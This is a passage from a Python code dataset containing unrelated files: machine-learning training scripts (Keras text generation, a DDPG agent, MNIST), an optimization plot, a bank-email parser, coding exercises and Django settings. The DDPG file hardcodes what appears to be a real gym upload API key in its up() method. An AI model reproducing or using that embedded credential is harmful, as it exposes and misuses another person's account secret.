optimizer=rms_prop,\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy', crossentropy, perplexity])\n\n# print summary of model layers\nprint(primary_model.summary())\n\n# TRAINING SETUP\n# --------------\nprint(\"\\nVocab size: %d\" % vocab_size)\nprint(\"Embedding size: %d\" % embedding_size)\n\nbatch_size = 32\nepochs = 25\nvalidation_split = 0.2\nprint(\"\\nTraining in batches of: %d\" % batch_size)\nprint(\"Training epochs: %d\" % epochs)\n\n# start point for generated text\nstart_words = ['the', 'there', 'from', 'have', 'can',\n 'engine', 'body', 'speed', 'elegance', 'safety',\n 'fun', 'love', 'excite', 'joy', 'curious', ]\n\n\n# apply temperature to each model sample\ndef temp_sample(predictions, temperature=1.0):\n # value 0 return argmax sampling\n if temperature <= 0:\n return np.argmax(predictions)\n predictions = np.asarray(predictions).astype('float64')\n predictions = np.log(predictions) / temperature\n exp_predictions = np.exp(predictions)\n predictions = exp_predictions / np.sum(exp_predictions)\n probability = np.random.multinomial(1, predictions, 1)\n return np.argmax(probability)\n\n\n# generate sentence one word at a time - limiting to 10 words\ndef generate_next_word(text, temp, sentence_length=10):\n word_indices = [word_to_index(word) for word in text.lower().split()]\n for n in range(sentence_length):\n prediction = primary_model.predict(x=np.array(word_indices))\n index = temp_sample(prediction[0, -1, :], temperature=temp)\n word_indices.append(index)\n return ' '.join(index_to_word(index) for index in word_indices)\n\n\n# writes prediction to file for each epoch\ndef on_epoch_end(epoch, _):\n # declare csv objects for both sampling styles\n wr = csv.writer(f, dialect='excel', lineterminator='\\n')\n for text in start_words:\n sentence = generate_next_word(text, 0)\n wr.writerow(sentence)\n\n\n# TRAIN MODEL\n# -----------\nprint('\\nTraining Start-Time: ', time.ctime(time.time()))\n\n# calls function on every epoch end\ngenerate_callback = LambdaCallback(on_epoch_end=on_epoch_end)\n\n# writes training stats to file\ncsv_logger = CSVLogger(path + '/Logs/' + version_name + '.log')\n\nhistory = History()\n\nmodel_check = ModelCheckpoint(path + '/Models/' + version_name + '_.{epoch:02d}.hdf5',\n monitor='val_perplexity',\n verbose=1,\n save_best_only=False,\n save_weights_only=False,\n mode='auto',\n period=1)\n\nwith open(path + '/Output/' + version_name + '.csv', 'w') as f:\n hist = primary_model.fit(train_input,\n train_output,\n batch_size=batch_size,\n verbose=1,\n shuffle='batch',\n epochs=epochs,\n validation_split=validation_split,\n callbacks=[generate_callback, csv_logger, history])\n\nprint('\\nTraining Finish Time: ', time.ctime(time.time()))\n\n# SAVE MODEL\n# -----------\n\nwith open(path + '/Logs/' + version_name + '_train_history.pkl', 'wb') as file:\n pickle.dump(hist.history, file)\n\nprint(\"\\nSaving trained model...\")\nprimary_model.save(path + '/Models/' + version_name + '.h5')\n\nprint(\"\\nSaving model weights...\")\nprimary_model.save_weights(path + '/Models/' + version_name + '_weights.h5')\n\nprint(\"\\nSaving model to JSON...\")\nmodel_json_string = primary_model.to_json()\nwith open(path + '/Models/' + version_name + '.json', \"w\") as f_j:\n json.dump(json.loads(model_json_string), f_j, indent=4)\n\nprint(\"\\nAll done!\")\n","sub_path":"primary.py","file_name":"primary.py","file_ext":"py","file_size_in_byte":7339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"337831775","text":"from matplotlib import pyplot as plt\nimport numpy as np\nfrom tools import FirstDerivative, SecondDerivative, GetA, GetInverseMatrix\nfrom functions import fun2, fun1, fun3, fun4, fun5, fun6, fun7, fun8\n\ndef fun(x1, x2):\n return x1**2 + 25*x2**2\n\ndef display(x_range, y_range, function, a=1, X0=None, delta=0.01):\n if X0 is None:\n X0 = [5, 5]\n\n fig = plt.figure(figsize=(7, 7)) # 定义新的三维坐标轴\n ax3 = plt.axes(projection='3d')\n\n # 定义三维数据\n xx = np.arange(x_range[0], x_range[1], 0.5)\n yy = np.arange(y_range[0], y_range[1], 0.5)\n X, Y = np.meshgrid(xx, yy)\n Z = function(X, Y)\n\n ax3.contour(X, Y, Z, 20, zdim='z', offset=-2, cmap='rainbow') # 等高线图,要设置offset,为Z的最小值\n ax3.plot_wireframe(X, Y, Z, color='gray')\n\n X = np.array([[X0[0]], [X0[1]]])\n X_new = np.array([[float('inf')], [float('inf')]])\n\n count = 0\n grad_list = []\n fx = []\n\n while abs((X[0, 0] - X_new[0, 0]) ** 2 + (X[1, 0] - X_new[1, 0]) ** 2) > delta:\n if count != 0: # count=0的时候new还没有更新,不能将其值赋给X\n X = X_new\n\n fx.append(function(X[0, 0], X[1, 0]))\n grad = np.array(FirstDerivative(X[0, 0], X[1, 0], function)).reshape(2, 1) # 计算梯度\n grad_list.append(grad)\n\n # !!!!!!!!!!!!!如果此时梯度为零,说明此时点为驻点!!!!!!!!!!!!!!!\n if abs(grad[0, 0]) < 0.001 and abs(grad[1, 0]) < 0.001:\n # 如果给一个微小的扰动大于此时的值,那么认为此时为极小值点\n if function(X[0, 0] + delta, X[1, 0] + delta) > function(X[0, 0], X[1, 0]):\n print(\"最优点\")\n ax3.scatter3D(X[0, 0], X[1, 0], function(X[0, 0], X[1, 0]), c='y', label='最优点', s=50)\n break\n\n ax3.scatter3D(X[0, 0], X[1, 0], function(X[0, 0], X[1, 0]), c='g', s=50)\n\n second_derivative = SecondDerivative(X[0, 0], X[1, 0], function) # 求二阶导\n inverse_matrix = GetInverseMatrix(second_derivative) # 求二阶导矩阵的逆\n\n X_new = np.array(X) - a * np.matmul(inverse_matrix, grad) # a是下降的步长\n\n count += 1\n\n plt.pause(0.4)\n\n ax3.scatter3D(X_new[0, 0], X_new[1, 0], function(X_new[0, 0], X_new[1, 0]), c='r', label='最优点', s=50)\n\n if X_new[0] == float('inf') and X_new[1] == float('inf'):\n X_new = X\n\n if count == 0:\n count += 1\n print(\"一共迭代了{:}次\\n极小值点为({:.2f},{:.2f})\\n极小值为{:.2f}\"\n .format(count, float(X_new[0, 0]), float(X_new[1, 0]), float(function(X_new[0, 0], X_new[1, 0]))))\n print(grad_list)\n print(\"fx = \", fx)\n\n ax3.set_xlabel('x')\n ax3.set_ylabel('y')\n ax3.set_zlabel('z')\n ax3.set_title('3D contour')\n plt.show()\n\n\nif __name__ == \"__main__\":\n display((-5, 10), (-5, 7), fun, X0=[2, 2])\n","sub_path":"无约束优化方法/牛顿型方法.py","file_name":"牛顿型方法.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"210721300","text":"import argparse\nparser = argparse.ArgumentParser(description = 'Square a number')\nparser.add_argument(\"square\", help=\"display a square of a given number\",\n type=int)\ndef main():\n args = parser.parse_args()\n return args.square**2\n\nif __name__ == \"__main__\":\n main()","sub_path":"tests/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"100136323","text":"from bs4 import BeautifulSoup\n\n\nclass BoFA:\n def parse(self, transaction_html):\n soup = BeautifulSoup(transaction_html, \"html.parser\")\n\n amount_element = soup.find(\"td\", text=\" Amount: \")\n transaction_dict = {}\n\n if amount_element is not None:\n transaction_amount = amount_element.find_parent().find_all('td')[-1].next_element.strip()\n transaction_dict[\"amount\"] = transaction_amount\n else:\n return\n\n merchant_element = soup.find(\"td\", text=\" Merchant: \")\n\n if merchant_element is not None:\n transaction_merchant = merchant_element.find_parent().find_all('td')[-1].next_element.strip()\n transaction_dict[\"merchant\"] = transaction_merchant\n\n date_element = soup.find(\"td\", text=\" Transaction date: \")\n\n if date_element is not None:\n transaction_date = date_element.find_parent().find_all('td')[-1].next_element.strip()\n transaction_dict[\"date\"] = transaction_date\n\n transaction_dict[\"card\"] = \"BoFA Card\"\n\n return transaction_dict\n","sub_path":"gmail/api/card_parsers/bofa_parser.py","file_name":"bofa_parser.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"5946397","text":"from __future__ import print_function\n\n# Deep Deterministic Policy Gradient Method\n# David Silver et al.\n\n# implemented in plain Keras, by Qin Yongliang\n# 2017 01 13\n\n'''\nsummary\n\n0. s for state, a for action, r for reward,\n q for 'action_quality', or expectation of sum of discounted future reward.\n\n1. you have 2 network, Mr. actor and Mr. critic\n - Mr. actor generate actions: a = actor(s)\n - Mr. critic score (state,action) pairs: q = critic(s,a)\n\n >in literature, Mr. actor is function mu(s), Mr. critic is function Q(s,a)\n\n2. you improve Mr. critic by using Bellman equation, or what they call TD-learning\n - Q(s1,a1) := r1 + gamma * Q(s2,a2) where a2 = actor(s2)\n - train Mr. critic to predict the calculated Q(s1,a1) given s1 and a1, using gradient descent and MSE loss.\n\n3. after that, improve Mr. actor by gradient ascent w.r.t. Q(s,a)\n - a1_maybe = actor(s1), q1_maybe = critic(s1,a1_maybe)\n - therefore q1_maybe = critic(s1,actor(s1)). we want to increase q1_maybe!!\n - then figure out what is the gradient of actor w.r.t. q1_maybe,\n using tf.gradient() or by compositing Keras Models (as I did, to keep things clean)\n - then do gradient ascent to increase Mr. actor's actions' q-value\n\n4. to stabilize the whole learning process:\n - random sampling of training examples from replay memory\n - use 'target' networks that are copy of actor and critic,\n their weights gradually shift towards the weights of the real actor and critic\n to reduce self-correlation/oscillation (well, if you know control theory)\n - add noise to actor's output in the beginning of learning, to turn deterministic actions into probabilistic ones\n - that's basically it\n\n5. now go master the game of Gym\n'''\n\n'''\npersonal tricks:\n\ncheck the Residual Dense Unit, it works!\n'''\n\n# gym boilerplate\nimport numpy as np\nimport gym\nfrom gym import wrappers\nfrom gym.spaces import Discrete, Box\n\n# keras boilerplate: the simplest way to neural networking\nfrom keras.models import *\nfrom keras.layers import *\nfrom keras.optimizers import *\nimport keras\nfrom math import *\nimport random\nimport keras.backend as K\nimport time\n\nfrom collections import deque\n\nfrom task import Task\n\n# replay buffer per http://pemami4911.github.io/blog/2016/08/21/ddpg-rl.html\nclass rpm(object):\n #replay memory\n def __init__(self,buffer_size):\n self.buffer_size = buffer_size\n self.count = 0\n self.buffer = deque()\n\n def add(self, tup):\n experience = tup\n if self.count < self.buffer_size:\n self.buffer.append(experience)\n self.count += 1\n else:\n self.buffer.popleft()\n self.buffer.append(experience)\n\n def size(self):\n return self.count\n\n def sample_batch(self, batch_size):\n '''\n batch_size specifies the number of experiences to add\n to the batch. If the replay buffer has less than batch_size\n elements, simply return all of the elements within the buffer.\n Generally, you'll want to wait until the buffer has at least\n batch_size elements before beginning to sample from it.\n '''\n batch = []\n\n if self.count < batch_size:\n batch = random.sample(self.buffer, self.count)\n else:\n batch = random.sample(self.buffer, batch_size)\n\n item_count = len(batch[0])\n res = []\n for i in range(item_count):\n k = np.array([item[i] for item in batch])\n if len(k.shape)==1: k = k.reshape(k.shape+(1,))\n res.append(k)\n return res\n\n# residual dense unit\ndef resdense(features):\n def unit(i):\n hfeatures = max(4,int(features/4))\n\n ident = i\n i = Dense(features,activation='tanh')(i)\n\n ident = Dense(hfeatures)(ident)\n ident = Dense(features)(ident)\n\n return add([ident,i])\n return unit\n\nclass nnagent(object):\n def __init__(self,\n \ttask,\n \tdiscount_factor,\n \toptimizer\n ):\n self.rpm = rpm(1000000) # 1M history\n \n\n self.inputdims = task.state_size\n # assume observation_space is continuous\n\n # if isinstance(action_space,Box): # if action space is continuous\n\n low = task.action_low\n high = task.action_high\n\n num_of_actions = task.action_size\n\n self.action_bias = (high+low)/2.\n self.action_multiplier = high - self.action_bias\n\n # say high,low -> [2,7], then bias -> 4.5\n # mult = 2.5. then [-1,1] multiplies 2.5 + bias 4.5 -> [2,7]\n\n self.is_continuous = True\n\n def clamper(env,actions):\n return np.clip(actions,a_max=env.action_high,a_min=env.action_low)\n\n self.clamper = clamper\n # else:\n # num_of_actions = action_space.n\n\n # self.action_bias = .5\n # self.action_multiplier = .5 # map (-1,1) into (0,1)\n\n # self.is_continuous = False\n\n self.outputdims = num_of_actions\n\n self.discount_factor = discount_factor\n self.optimizer = optimizer\n\n ids,ods = self.inputdims,self.outputdims\n self.actor = self.create_actor_network(ids,ods)\n self.critic, self.frozen_critic = self.create_critic_network(ids,ods)\n\n print('inputdims:{}, outputdims:{}'.format(ids,ods))\n print('actor network:')\n self.actor.summary()\n print('critic network:')\n self.critic.summary()\n\n # target networks: identical copies of actor and critic\n self.actor_target = self.create_actor_network(ids,ods)\n self.critic_target, self.frozen_critic_target = self.create_critic_network(ids,ods)\n\n self.replace_weights(tau=1.)\n\n # now the dirty part: the actor trainer --------------------------------\n\n # explaination of this part is written in the train() method\n\n s_given = Input(shape=(self.inputdims,))\n a1_maybe = self.actor(s_given)\n q1_maybe = self.frozen_critic([s_given,a1_maybe])\n # frozen weight version of critic. so we can train only the actor\n\n actor_trainer = Model(input=s_given,output=q1_maybe)\n\n # use negative of q1_maybe as loss (so we can maximize q by minimizing the loss)\n def neg_q1(y_true,y_pred):\n return - y_pred # neat!\n\n actor_trainer.compile(optimizer=self.optimizer,loss=neg_q1)\n self.actor_trainer = actor_trainer\n # dirty part ended -----------------------------------------------------\n\n # (gradually) replace target network weights with online network weights\n def replace_weights(self,tau=0.002):\n theta_a,theta_c = self.actor.get_weights(),self.critic.get_weights()\n theta_a_targ,theta_c_targ = self.actor_target.get_weights(),self.critic_target.get_weights()\n\n # mixing factor tau : we gradually shift the weights...\n theta_a_targ = [theta_a[i]*tau + theta_a_targ[i]*(1-tau) for i in range(len(theta_a))]\n theta_c_targ = [theta_c[i]*tau + theta_c_targ[i]*(1-tau) for i in range(len(theta_c))]\n\n self.actor_target.set_weights(theta_a_targ)\n self.critic_target.set_weights(theta_c_targ)\n\n # a = actor(s) : predict actions given state\n def create_actor_network(self,inputdims,outputdims):\n inp = Input(shape=(inputdims,))\n i = inp\n i = resdense(32)(i)\n i = resdense(32)(i)\n i = resdense(64)(i)\n i = resdense(outputdims)(i)\n # map into (0,1)\n i = Activation('tanh')(i)\n # map into action_space\n i = Lambda(lambda x:x * self.action_multiplier + self.action_bias)(i)\n\n out = i\n model = Model(input=inp,output=out)\n model.compile(loss='mse',optimizer=self.optimizer)\n return model\n\n # q = critic(s,a) : predict q given state and action\n def create_critic_network(self,inputdims,actiondims):\n inp = Input(shape=(inputdims,))\n act = Input(shape=(actiondims,))\n i = merge([inp,act],mode='concat')\n\n i = resdense(64)(i)\n i = resdense(32)(i)\n i = resdense(32)(i)\n i = resdense(1)(i)\n out = i\n model = Model(input=[inp,act],output=out)\n model.compile(loss='mse',optimizer=self.optimizer)\n\n # now we create a frozen_model,\n # that uses the same layers with weights frozen when trained.\n for i in model.layers:\n i.trainable = False # froze the layers\n\n frozen_model = Model(input=[inp,act],output=out)\n frozen_model.compile(loss='mse',optimizer=self.optimizer)\n\n return model,frozen_model\n\n def train(self,verbose=1):\n memory = self.rpm\n critic,frozen_critic = self.critic,self.frozen_critic\n actor = self.actor\n batch_size = 64\n\n if memory.size() > batch_size:\n #if enough samples in memory\n\n # sample randomly a minibatch from memory\n [s1,a1,r1,isdone,s2] = memory.sample_batch(batch_size)\n # print(s1.shape,a1.shape,r1.shape,isdone.shape,s2.shape)\n\n # a2_targ = actor_targ(s2) : what will you do in s2, Mr. old actor?\n a2 = self.actor_target.predict(s2)\n\n # q2_targ = critic_targ(s2,a2) : how good is action a2, Mr. old critic?\n q2 = self.critic_target.predict([s2,a2])\n\n # if a2 is q2-good, then what should q1 be?\n # Use Bellman Equation! (recursive definition of q-values)\n # if not last step of episode:\n # q1 = (r1 + gamma * q2)\n # else:\n # q1 = r1\n\n q1_target = r1 + (1-isdone) * self.discount_factor * q2\n # print(q1_target.shape)\n\n # train the critic to predict the q1_target, given s1 and a1.\n critic.fit([s1,a1],q1_target,\n batch_size=batch_size,\n nb_epoch=1,\n verbose=verbose,\n shuffle=False\n )\n\n # now the critic can predict more accurate q given s and a.\n # thanks to the Bellman equation, and David Silver.\n\n # with a better critic, we can now improve our actor!\n\n if False: # the following part is for explaination purposes\n\n # a1_pred = actor(s1) : what will you do in s1, Mr. actor?\n a1_maybe = actor.predict(s1)\n # this action may not be optimal. now let's ask the critic.\n\n # what do you think of Mr. actor's action on s1, Mr. better critic?\n q1_maybe = critic.predict([s1,a1_maybe])\n\n # what should we do to the actor, to increase q1_maybe?\n # well, calculate the gradient of actor parameters\n # w.r.t. q1_maybe, then do gradient ascent.\n\n # so let's build a model that trains the actor to output higher q1_maybe values\n\n s_given = Input(shape=(self.inputdims,))\n a1_maybe = actor(s_given)\n q1_maybe = frozen_critic([s_given,a1_maybe])\n # frozen weight version of critic. so we only train the actor\n\n actor_trainer = Model(input=s_given,output=q1_maybe)\n\n # use negative of q1_maybe as loss (so we can maximize q by minimizing the loss)\n def neg_q1(y_true,y_pred):\n return - y_pred # neat!\n\n actor_trainer.compile(optimizer=self.optimizer,loss=neg_q1)\n\n else: # the actor_trainer is already initialized in __init__\n actor_trainer = self.actor_trainer\n\n actor_trainer.fit(s1,\n np.zeros((batch_size,1)), # useless target label\n batch_size=batch_size,\n nb_epoch=1,\n verbose=verbose,\n shuffle=False\n )\n\n # now both the actor and the critic have improved.\n self.replace_weights()\n\n else:\n pass\n # print('# no enough samples, not training')\n\n def feed_one(self,tup):\n self.rpm.add(tup)\n\n # gymnastics\n def play(self,env,max_steps=-1,realtime=False,render=True,noise_level=0.): # play 1 episode\n max_steps = max_steps if max_steps > 0 else 5000\n steps = 0\n total_reward = 0\n\n # stack a little history to ensure markov property\n # LSTM will definitely be used here in the future...\n global que # python 2 quirk\n que = np.zeros((self.inputdims,),dtype='float32') # list of recent history actions\n\n def quein(observation):\n global que # python 2 quirk\n length = que.shape[0]\n que = np.hstack([que,observation])[-length:]\n\n # what the agent see as state is a stack of history observations.\n\n observation = env.reset()\n quein(observation) # quein o1\n lastque = que.copy() # s1\n\n while True and steps <= max_steps:\n steps +=1\n\n # add noise to our actions, since our policy by nature is deterministic\n exploration_noise = np.random.normal(loc=0.,scale=noise_level,size=(self.outputdims,))\n\n action = self.act(lastque) # a1\n action += exploration_noise\n action = self.clamper(env,action)\n\n # o2, r1,\n observation, reward, done = env.step(action)\n\n # d1\n isdone = 1 if done else 0\n total_reward += reward\n\n quein(observation) # quein o2\n nextque = que.copy() # s2\n\n # feed into replay memory\n self.feed_one((lastque,action,reward,isdone,nextque)) # s1,a1,r1,isdone,s2\n\n lastque = nextque\n\n # if render and (steps%10==0 or realtime==True): env.render()\n if done :\n break\n\n verbose= 2 if steps==1 else 0\n self.train(verbose=verbose)\n\n print('episode done in',steps,'steps, total reward',total_reward)\n return\n\n # one step of action, given observation\n def act(self,observation):\n actor = self.actor\n obs = np.reshape(observation,(1,len(observation)))\n actions = actor.predict([obs])[0]\n return actions\n\nclass playground(object):\n def __init__(self,envname):\n self.envname=envname\n env = gym.make(envname)\n self.env = env\n\n self.monpath = './experiment-'+self.envname\n\n def wrap(self):\n from gym import wrappers\n self.env = wrappers.Monitor(self.env,self.monpath,force=True)\n\n def up(self):\n self.env.close()\n gym.upload(self.monpath, api_key='sk_ge0PoVXsS6C5ojZ9amTkSA')\n\n# p = playground('Pendulum-v0')\n\ntarget_pos = np.array([0., 0., 10.])\ntask= Task(target_pos = target_pos)\nagent = nnagent(task,\ndiscount_factor=.995,\noptimizer=RMSprop()\n)\n\ndef r(ep):\n e = task\n for i in range(ep):\n noise_level = max(3e-2,(50.-i)/50.)\n print('ep',i,'/',ep,'noise_level',noise_level)\n agent.play(e,max_steps=1000,noise_level=noise_level)\n\n\nr(100)","sub_path":"Quadcopter /nnagent/Pendulum-v0.py","file_name":"Pendulum-v0.py","file_ext":"py","file_size_in_byte":14918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"11437665","text":"import numpy as np\r\nimport random\r\n\r\ndef gridGen(image, things_dict, gridShape, end = None):\r\n imageHeight, imageWidth = image.shape[:2]\r\n gridWidth, gridHeight = gridShape\r\n grid = np.zeros((gridHeight, gridWidth), np.uint8)\r\n things_dict_temp = things_dict.copy()\r\n if end:\r\n del things_dict_temp[end[0]]\r\n\r\n for key in things_dict_temp:\r\n thing = things_dict_temp[key]\r\n xBoundList = [int(imageWidth / gridWidth * cnt) for cnt in range(gridWidth + 1)]\r\n yBoundList = [int(imageHeight / gridHeight * cnt) for cnt in range(gridHeight + 1)]\r\n\r\n yVals, xVals = np.where(thing.mask == 255)\r\n for _ in range(int(len(xVals) / 5)):\r\n index = random.randint(0, len(xVals) - 1)\r\n xVal = xVals[index]\r\n yVal = yVals[index]\r\n\r\n gridX, gridY = _inGrid((xVals[index], yVals[index]), (xBoundList, yBoundList))\r\n\r\n if key[0] == 'G' and len(key) == 2:\r\n grid[gridY, gridX] = 1\r\n elif key[0] == 'R' and len(key) == 2:\r\n grid[gridY, gridX] = 2\r\n return grid\r\n\r\ndef locations(image, things_dict, gridShape):\r\n imageHeight, imageWidth = image.shape[:2]\r\n gridWidth, gridHeight = gridShape\r\n\r\n xBoundList = [int(imageWidth / gridWidth * cnt) for cnt in range(gridWidth + 1)]\r\n yBoundList = [int(imageHeight / gridHeight * cnt) for cnt in range(gridHeight + 1)]\r\n\r\n things_info = {}\r\n robot_info = None\r\n for key in things_dict:\r\n if key == 'ROBOT':\r\n thing_temp = things_dict[key]\r\n gridX, gridY = _inGrid((thing_temp.cX, thing_temp.cY), (xBoundList, yBoundList))\r\n\r\n robot_info = (gridY, gridX)\r\n else:\r\n thing_temp = things_dict[key]\r\n gridX, gridY = _inGrid((thing_temp.cX, thing_temp.cY), (xBoundList, yBoundList))\r\n\r\n things_info[key] = (gridY, gridX)\r\n\r\n return robot_info, things_info\r\n\r\ndef _inGrid(coord, bounds):\r\n xBoundList, yBoundList = bounds\r\n xVal, yVal = coord\r\n\r\n temp_x = xBoundList.copy()\r\n temp_y = yBoundList.copy()\r\n\r\n temp_x.append(xVal)\r\n temp_x.sort()\r\n gridX = temp_x.index(xVal) - 1\r\n\r\n temp_y.append(yVal)\r\n temp_y.sort()\r\n gridY = temp_y.index(yVal) - 1\r\n\r\n return gridX, gridY\r\n","sub_path":"Desk Arranging Robot/robotController_v20190828/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"77201751","text":"# -*- coding: utf-8 -*-\nclass Solution(object):\n def backspaceCompare(self, S, T):\n \"\"\"\n Solution: Stack\n Time Complexity: O(n)\n Space Complexity: O(n)\n Inspired By: MySELF!! (36ms, beat 15.08%)\n :type S: str\n :type T: str\n :rtype: bool\n \"\"\"\n def evaluate(target):\n stack = []\n for char in target:\n if char != '#':\n stack.append(char)\n elif stack:\n stack.pop()\n else:\n stack = []\n return stack\n\n return evaluate(S) == evaluate(T)\n\n","sub_path":"844. Backspace String Compare/Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"609086947","text":"import cs50\n\ndef main():\n height = get_positive_int()\n print(\"\")\n for i in range(height):\n for j in range (height-1-i):\n print(\" \", end=\"\")\n for j in range (i+2):\n print(\"#\", end=\"\")\n print(\" \", end=\"\")\n for j in range (i+2):\n print(\"#\", end=\"\")\n print(\"\")\n print(\"\")\n \ndef get_positive_int():\n while True:\n print(\"Give me a positive int (1-23): \", end=\"\")\n height = cs50.get_int()\n if height >= 1 and height <= 23:\n break\n return height\n \nif __name__ == \"__main__\":\n main()","sub_path":"mario/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"497827838","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n#样本数据是60000*784\n#样本标签是60000*10\n\n#输入层784个神经元\n#输出层10个神经元\n#没有隐藏层\n\n#对于每一个样本来说,输入是1*784\n#对于每一个样本来说,权值是784*10\n#对于每一个样本来说,输出是1*784,输出例子2:00100000000\n\n#1、载入数据集\n'''one_hot 把标签转化为只有0和1的数据,也就是对于每一个样本,只有一位是1,其他全是0'''\n#写路径最好加原始字符串r\nmnist = input_data.read_data_sets(r\"E:\\project1\\MNIST_data\\MNIST_data\",one_hot=True)\n\n'''每个批次的大小(往神经网络中一次放入一个批次,一个批次一个批次的放入),这里的一个批次是100张图片'''\nbatch_size = 100\n\n#总共批次数量为n_batch\n'''//整数除法,返回不大于结果的最大整数'''\nn_batch = mnist.train.num_examples // batch_size\n\n#定义两个placeholder\nx = tf.placeholder(tf.float32,[None,784]) #样本集\ny = tf.placeholder(tf.float32,[None,10]) #样本标签集\n\n#创建一个简单的神经网络\nW = tf.Variable(tf.zeros([784,10])) #这个是针对每一个样本的权值,每一个样本有784个像素\nb = tf.Variable(tf.zeros([1,10])) #中间神经元个数是10,一般默认行���一\nprediction = tf.nn.softmax(tf.matmul(x,W)+b)\n\n#二次代价函数\n# loss = tf.reduce_mean(tf.square(y-prediction))\n#softmax交叉熵代价函数\n#这个函数就是softmax和交叉熵代价函数搭配使用,参数主要填的是label:真实标签,logits:预测标签\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=prediction))\n\n#使用梯度下降法\ntrain_step = tf.train.GradientDescentOptimizer(0.2).minimize(loss)\n\n#初始化变量\ninit = tf.global_variables_initializer()\n\n#结果存放在一个布尔型列表中\n'''\ntf.argmax(input, dimension, name=None) 返回最大数值的下标,dimension=0 按列找 ,dimension=1 按行找\n返回的是input中的最大值的索引号\n如果vector是一个向量,那就返回一个值,\n如果是一个矩阵,那就返回一个向量,这个向量的每一个维度都是相对应矩阵行的最大值元素的索引号。\n通常和tf.equal()一起使用,计算模型准确度\n'''\ncorrect_prediction = tf.equal(tf.argmax(y,1),tf.argmax(prediction,1))\n#求准确率\n'''correct_prediction原来的格式是bool,tf.cast将它的格式转化为float32位'''\naccuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\n\nwith tf.Session() as sess:\n sess.run(init)\n for epoch in range(21):\n for batch in range(n_batch):\n batch_xs,batch_ys = mnist.train.next_batch(batch_size)\n sess.run(train_step,feed_dict={x:batch_xs,y:batch_ys})\n \n acc = sess.run(accuracy,feed_dict={x:mnist.test.images,y:mnist.test.labels})\n print(\"Iter \" + str(epoch) + \",Testing Accuracy \" + str(acc))\n\n\n\n\n\n\n","sub_path":"3.2MNIST数据集分类简单版本.py","file_name":"3.2MNIST数据集分类简单版本.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"243572317","text":"from re import compile as regex\nfrom knock50 import sentences\n\nexpand = regex(r'([.,:?!]|[A-Z]\\w+|(\\w\\.){2,})')\ninvisible = regex(r'[\\s\\b]+')\n\ndef split(line):\n line = expand.sub(r' \\1 ', line) # or src_obj.index\n return tuple(i for i in invisible.split(line) if len(i))\n\nif __name__ == '__main__':\n for sent in sentences():\n for tok in split(sent):\n print(tok)\n","sub_path":"zchen/chapter06/knock51.py","file_name":"knock51.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"479966171","text":"\"\"\"\nDjango settings for grubbing project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.6/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.6/ref/settings/\n\"\"\"\n\nfrom grub_environment import GrubEnv\n\nge = GrubEnv()\n\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = ge.env('SECRET_KEY')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = ge.env('DEBUG', False)\n\nTEMPLATE_DEBUG = ge.env('TEMPLATE_DEBUG', False)\n\nALLOWED_HOSTS = [ge.env('ALLOWED_HOSTS', '*')]\n\n# Application definition\n\nLOCAL_APPS = (\n 'grub',\n 'auth',\n)\n\nTHIRD_PARTY_APPS = (\n 'rest_framework',\n 'south',\n 'gunicorn',\n)\n\nDEFAULT_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.gis',\n)\n\nINSTALLED_APPS = DEFAULT_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'grubbing.urls'\n\nWSGI_APPLICATION = 'grubbing.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.6/ref/settings/#databases\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': ge.env('DB_ENGINE'),\n 'NAME': ge.env('DB_NAME'),\n 'USER': ge.env('DB_USER'),\n 'PASSWORD': ge.env('DB_PASS'),\n 'HOST': ge.env('DB_HOST')\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.6/topics/i18n/\n\nLANGUAGE_CODE = 'es-VE'\n\nTIME_ZONE = 'America/Caracas'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.6/howto/static-files/\n\nSTATIC_URL = 